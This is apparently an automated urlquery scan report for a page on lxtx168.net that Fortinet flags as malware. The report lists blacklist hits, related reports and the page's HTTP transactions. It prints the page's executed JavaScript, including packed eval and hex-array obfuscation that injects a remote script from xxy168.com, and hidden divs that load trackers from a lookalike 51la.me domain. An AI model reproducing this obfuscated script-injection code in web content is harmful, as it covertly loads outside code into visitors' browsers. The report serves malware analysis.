Overview

URL: lxtx168.net/yibeipingtai/11.html
IP: 172.252.155.55
ASN: AS18779 EGIHosting
Location: United States
Report completed: 2018-12-13 13:16:46 CET
urlquery Alerts: No alerts detected


Settings

UserAgent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified | Severity | Host | Comment
2018-12-13 | 2 | lxtx168.net/yibeipingtai/11.html | Malware
2018-12-13 | 2 | www.lxtx168.net/html5.js | Malware
2018-12-13 | 2 | www.lxtx168.net/yibeipingtai/11.html | Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 172.252.155.55

Date | UQ / IDS / BL | URL | IP
2019-02-11 15:56:01 +0100 | 0 - 0 - 11 | lxtx168.net/yibeipingtaidenglu/2.html | 172.252.155.55
2018-10-12 22:48:02 +0200 | 0 - 4 - 10 | lxtx168.net/yibeipingtai | 172.252.155.55
2018-10-12 16:00:24 +0200 | 0 - 4 - 8 | www.lxtx168.net/tags.html | 172.252.155.55
2018-10-12 06:34:56 +0200 | 0 - 4 - 8 | www.lxtx168.net/yibeipingtai/ | 172.252.155.55
2018-10-09 12:06:56 +0200 | 0 - 0 - 10 | lxtx168.net/yibeipingtai | 172.252.155.55
2018-10-08 22:59:54 +0200 | 0 - 4 - 8 | www.lxtx168.net/yibeipingtaidenglu/2.html | 172.252.155.55
2018-10-04 12:12:47 +0200 | 0 - 0 - 8 | www.lxtx168.net/tag/dahuajiaren_8_1.html | 172.252.155.55
2018-10-04 12:12:46 +0200 | 0 - 0 - 8 | www.lxtx168.net/tag/dafu_1_1.html | 172.252.155.55
2018-07-04 07:27:08 +0200 | 0 - 1 - 8 | www.lxtx168.net/yibeipingtai/13.html | 172.252.155.55
2018-07-01 23:47:11 +0200 | 0 - 4 - 9 | lxtx168.net/tag/chenxin__4_1.html | 172.252.155.55

Last 10 reports on ASN: AS18779 EGIHosting

Date | UQ / IDS / BL | URL | IP
2019-04-24 12:48:30 +0200 | 0 - 0 - 2 | 0g1e2pqa.com/pjx | 45.38.159.204
2019-04-24 12:34:57 +0200 | 0 - 0 - 2 | 7uoi.cn/kaifa | 107.186.21.133
2019-04-24 12:27:40 +0200 | 0 - 0 - 2 | p9b58.cn/sitemap.html | 107.164.61.54
2019-04-24 12:27:19 +0200 | 0 - 0 - 1 | qinzimy.com/art-type-id-6-pg-5.html | 172.252.45.100
2019-04-24 12:24:27 +0200 | 0 - 0 - 1 | www.hgyynk.com/bzh.php | 172.252.13.119
2019-04-24 12:22:59 +0200 | 0 - 0 - 2 | adhantage.com/rll | 107.164.74.182
2019-04-24 12:10:59 +0200 | 0 - 0 - 2 | ifjl94.cn/xrf | 107.164.61.84
2019-04-24 12:10:18 +0200 | 0 - 0 - 3 | www.iphone86.com/default.php | 142.111.197.240
2019-04-24 12:07:02 +0200 | 0 - 0 - 1 | www.china-gfrc.com/bzh.php | 107.186.69.54
2019-04-24 11:54:22 +0200 | 0 - 0 - 1 | tchihe.com/fzn | 23.230.130.78

Last 10 reports on domain: lxtx168.net

Date | UQ / IDS / BL | URL | IP
2019-02-11 15:56:01 +0100 | 0 - 0 - 11 | lxtx168.net/yibeipingtaidenglu/2.html | 172.252.155.55
2018-10-12 22:48:02 +0200 | 0 - 4 - 10 | lxtx168.net/yibeipingtai | 172.252.155.55
2018-10-12 16:00:24 +0200 | 0 - 4 - 8 | www.lxtx168.net/tags.html | 172.252.155.55
2018-10-12 06:34:56 +0200 | 0 - 4 - 8 | www.lxtx168.net/yibeipingtai/ | 172.252.155.55
2018-10-09 12:06:56 +0200 | 0 - 0 - 10 | lxtx168.net/yibeipingtai | 172.252.155.55
2018-10-08 22:59:54 +0200 | 0 - 4 - 8 | www.lxtx168.net/yibeipingtaidenglu/2.html | 172.252.155.55
2018-10-04 12:12:47 +0200 | 0 - 0 - 8 | www.lxtx168.net/tag/dahuajiaren_8_1.html | 172.252.155.55
2018-10-04 12:12:46 +0200 | 0 - 0 - 8 | www.lxtx168.net/tag/dafu_1_1.html | 172.252.155.55
2018-07-04 07:27:08 +0200 | 0 - 1 - 8 | www.lxtx168.net/yibeipingtai/13.html | 172.252.155.55
2018-07-01 23:47:11 +0200 | 0 - 4 - 9 | lxtx168.net/tag/chenxin__4_1.html | 172.252.155.55


JavaScript

Executed Scripts (1)


Executed Evals (3)

#1 JavaScript::Eval (size: 83, repeated: 1) - SHA256: 63f8bcafeba184770e1ded793351187514a1fdb796cf4a96cbd98e3446ea7815

document.write("<script src=http://js.users.51.la.51la.me/19191831.php></script>");
                                    

#2 JavaScript::Eval (size: 572, repeated: 1) - SHA256: 693f66c4fe4834703d0f7b98eb18d542c88c1d4a62122ccd63de283c43a65477

eval(function(p, a, c, k, e, r) {
    e = function(c) {
        return c.toString(a)
    };
    if (!''.replace(/^/, String)) {
        while (c--) r[e(c)] = k[c] || e(c);
        k = [function(e) {
            return r[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--)
        if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p
}('3 4=["<i j=\'k://l.n.7/m/8.9\' a=\'b\' q=\'d/e\'></f","g>","h"];3 5=[4[0],4[1],4[2]];3 6=[5[0],5[1],5[2]];3 o=p;c[6[2]](6[0]+6[1])', 27, 27, '|||var|_0x4c74|_0x9e1d|_0x2644|com|danyue|js|language|JavaScript|document|text|javascript|sc|ript|write|script|src|https|www||xxy168|site_ture|false|type'.split('|'), 0, {}))
                                    

#3 JavaScript::Eval (size: 288, repeated: 1) - SHA256: fad05e4659a075e0f1fee34938678f281992b3fce769d038e57b0070dedd753a

var _0x4c74 = ["<script src='https://www.xxy168.com/m/danyue.js' language='JavaScript' type='text/javascript'></sc", "ript>", "write"];
var _0x9e1d = [_0x4c74[0], _0x4c74[1], _0x4c74[2]];
var _0x2644 = [_0x9e1d[0], _0x9e1d[1], _0x9e1d[2]];
var site_ture = false;
document[_0x2644[2]](_0x2644[0] + _0x2644[1])
                                    

Executed Writes (4)

#1 JavaScript::Write (size: 136, repeated: 1) - SHA256: 6725b84bf9b28b04fbe4d11d6e9fa226a76f671dffff9b483c124668c602dceb

<div style="display:none"><script src="https://js.users.51.la/18819112.js" language="JavaScript" type="text/javascript"></script></div>
                                    

#2 JavaScript::Write (size: 136, repeated: 1) - SHA256: 3f254a2d748338d58132242b51c2b7156c1a4889a9050da7edac818f5604ddc5

<div style="display:none"><script src="https://js.users.51.la/18992991.js" language="JavaScript" type="text/javascript"></script></div>
                                    

#3 JavaScript::Write (size: 103, repeated: 1) - SHA256: b01c73323f09e30db75a90b17cc05e421d8e2723843854648a013fed4ec7bcaf

<script src='https://www.xxy168.com/m/danyue.js' language='JavaScript' type='text/javascript'></script>
                                    

#4 JavaScript::Write (size: 64, repeated: 1) - SHA256: 59647fc49760336c6586274ab19aa1a99698975f88fa8983232ce9d5116bb8ac

<script src=http://js.users.51.la.51la.me/19191831.php></script>
                                    


HTTP Transactions (7)


Request Response
                                        
GET /yibeipingtai/11.html HTTP/1.1
Host: lxtx168.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
172.252.155.55
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
Server: nginx
Date: Thu, 13 Dec 2018 11:54:07 GMT
Content-Length: 178
Connection: keep-alive
Location: http://www.lxtx168.net/yibeipingtai/11.html


--- Additional Info ---
Magic:  HTML document text
Size:   178
Md5:    cd2e0e43980a00fb6a2742d3afd803b8
Sha1:   81ffbd1712afe8cdf138b570c0fc9934742c33c1
Sha256: bd9df047d51943acc4bc6cf55d88edb5b6785a53337ee2a0f74dd521aedde87d

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
GET /html5.js HTTP/1.1
Host: www.lxtx168.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.lxtx168.net/yibeipingtai/11.html

                                         
172.252.155.55
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Server: nginx
Date: Thu, 13 Dec 2018 11:54:08 GMT
Last-Modified: Sat, 04 Nov 2017 02:47:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 13 Dec 2018 12:54:08 GMT
Cache-Control: max-age=3600
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   825
Md5:    b3bde07c723ae5a45febdba234cdc922
Sha1:   f79be8236145dd3f96efe9f82dacf61cc629f889
Sha256: 8f7e5e5320e2b117dffb35fdc2c060f5ea9f68e9186ce0fa35136a66b0c05b60

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
GET /templets/default/css/main.css HTTP/1.1
Host: www.lxtx168.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.lxtx168.net/yibeipingtai/11.html

                                         
172.252.155.55
HTTP/1.1 200 OK
Content-Type: text/css
Server: nginx
Date: Thu, 13 Dec 2018 11:54:08 GMT
Last-Modified: Tue, 31 Jan 2017 05:04:53 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 13 Dec 2018 12:54:08 GMT
Cache-Control: max-age=3600
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   12706
Md5:    46439db374f2f9e018cd89a39a4eb09d
Sha1:   ec1ca5401da0d5b1761539714075902ec2922375
Sha256: 17b528c77635e13fb723e56fa227bcfb78ae58cd8350513fe17cbe72ffd9e4ff
                                        
GET /yibeipingtai/11.html HTTP/1.1
Host: www.lxtx168.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
172.252.155.55
HTTP/1.1 200 OK
Content-Type: text/html
Server: nginx
Date: Thu, 13 Dec 2018 11:54:08 GMT
Last-Modified: Tue, 31 Jan 2017 06:45:18 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   70183
Md5:    e4569aeeddde1f9ec9a630d8f937c674
Sha1:   97f932bfebdece513dd6cc6c9c5b87c07d02e908
Sha256: 13272460dd6e32c5fb1e5848e51ac6765a12bde3749015663e80bc986071e877

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
GET /19191831.php HTTP/1.1
Host: js.users.51.la.51la.me
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.lxtx168.net/yibeipingtai/11.html

                                         
118.184.51.145
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
Server: nginx
Date: Thu, 13 Dec 2018 12:15:19 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Location: http://www.51.la


--- Additional Info ---
Magic:  UTF-8 Unicode text, with no line terminators
Size:   3
Md5:    ecaa88f7fa0bf610a5a26cf545dcd3aa
Sha1:   57218c316b6921e2cd61027a2387edc31a2d9471
Sha256: f1945cd6c19e56b3c1c78943ef5ec18116907a4ca1efc40a57d48ab1db7adfc5
                                        
GET / HTTP/1.1
Host: www.51.la
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.lxtx168.net/yibeipingtai/11.html

                                         
                                         0.0.0.0
                                        


--- Additional Info ---
                                        
GET / HTTP/1.1
Host: www.51.la
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.lxtx168.net/yibeipingtai/11.html

                                         
183.131.207.78
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Server: HuaweiCloudWAF
Date: Thu, 13 Dec 2018 12:16:04 GMT
Content-Length: 161
Connection: keep-alive
Set-Cookie: HWWAFSESID=d66401188ff8b2a7f75; path=/ HWWAFSESTIME=1544703360916; path=/
Location: https://www.51.la


--- Additional Info ---
Magic:  HTML document text
Size:   161
Md5:    a9eec393cdcff2fc0822a1c0588ca25b
Sha1:   dd0d3588192dac2bfd7c847685a73af82dc9e5fc
Sha256: 0286536f8370884ea15084bf2347e81b4dfeddcc894cf6e81263e77728bc192c